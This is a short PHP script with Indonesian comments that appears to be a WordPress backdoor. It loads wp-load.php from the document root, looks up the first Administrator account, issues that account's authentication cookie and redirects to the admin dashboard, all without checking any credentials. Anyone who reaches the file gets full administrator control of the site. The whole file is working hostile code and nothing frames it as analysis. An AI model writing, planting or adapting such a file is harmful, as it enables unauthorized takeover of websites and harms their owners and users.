<?php
// Ambil path root dari server
$mr = $_SERVER['DOCUMENT_ROOT'];
@chdir($mr);

// Cek apakah file wp-load.php ada
if (file_exists('wp-load.php')) {
    include 'wp-load.php';

    // Query untuk mengambil 1 pengguna dengan peran Administrator
    $wp_user_query = new WP_User_Query([
        'role'   => 'Administrator',
        'number' => 1,
        'fields' => 'ID'
    ]);

    $results = $wp_user_query->get_results();

    // Jika admin ditemukan, login otomatis dan redirect ke dashboard
    if (!empty($results)) {
        wp_set_auth_cookie($results[0]);
        wp_redirect(admin_url());
        exit();
    }

    // Jika tidak ada admin ditemukan
    die('NO ADMIN');
} else {
    // Jika wp-load.php tidak ditemukan
    die('Failed to load');
}
?>
